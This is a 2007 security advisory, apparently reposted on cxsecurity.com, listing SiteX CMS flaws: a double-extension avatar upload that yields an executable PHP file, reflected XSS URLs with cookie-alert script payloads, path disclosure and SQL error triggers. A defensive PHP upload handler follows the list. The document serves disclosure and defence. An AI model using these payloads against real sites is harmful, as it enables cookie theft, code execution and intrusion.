sitex multiple vulnerabilities

2007-03-08 / 2007-03-09
Credit: none
Risk: High
Local: No
Remote: Yes
CWE: N/A

global risk: critical

upload vulnerability:
in the user profile, upload an avatar with a double extension like: file.php.jpg
once it's done, you are going to get an error like:
Fatal error: Call to undefined function imagedestroy() in /.
but the last extension (jpg) will be removed by the script, and the file is stored in /content/avatars as random_numberfile.php

xss get:
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</ script>
/sitex/search.php?search=<script>alert(document.cookie)</script>

xss via mysql error:
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie) </script>
/calendar_events.php?page='"><script>alert(document.cookie)</script>

full path disclosure:
/sitex/calendar.php?sxMonth[]=1
/sitex/calendar.php?sxMonth=1&sxYear[]=2007
/calendar_events.php?page[]=1

multiple sql errors:
just add a ' on any var .. or on any field (like in forum, search, ...etc)

regards
laurent gaffi
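The upload issue above comes from building the stored file name out of the client-supplied name. The following is an added example, not SiteX code, of a handler that ignores the client name and takes the extension from the image header instead; the function names, the size limit and the accepted types are assumptions.

```php
<?php
// Added example, not SiteX code. Function and parameter names are assumptions.

const AVATAR_TYPES = [               // accepted image types => stored extension
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

// Returns a server-chosen file name for the upload, or null to reject it.
// The client-supplied name (e.g. "file.php.jpg") is never consulted.
function avatar_stored_name(string $tmpPath, int $maxBytes = 512000): ?string
{
    $size = @filesize($tmpPath);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        return null;
    }
    // getimagesize() parses the image header and does not require GD.
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(AVATAR_TYPES[$info[2]])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . AVATAR_TYPES[$info[2]];
}

// Request-handler use: move only genuine uploads, under the generated name.
function store_avatar(array $file, string $avatarDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $name = avatar_stored_name($file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $dest = rtrim($avatarDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}

// Constructed sample inputs, exercised from the CLI only.
if (PHP_SAPI === 'cli') {
    $gif = tempnam(sys_get_temp_dir(), 'av');   // minimal GIF header
    file_put_contents($gif, 'GIF89a' . pack('v2', 1, 1) . "\x80\x00\x00");
    $php = tempnam(sys_get_temp_dir(), 'av');   // PHP source, not an image
    file_put_contents($php, "<?php echo 'constructed sample'; ?>");
    var_dump(avatar_stored_name($gif), avatar_stored_name($php));
    unlink($gif);
    unlink($php);
}
```

A file that is a valid image but also carries PHP text still passes the header check, so the avatar directory should additionally be served with script execution disabled.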


Copyright 2024, cxsecurity.com

 
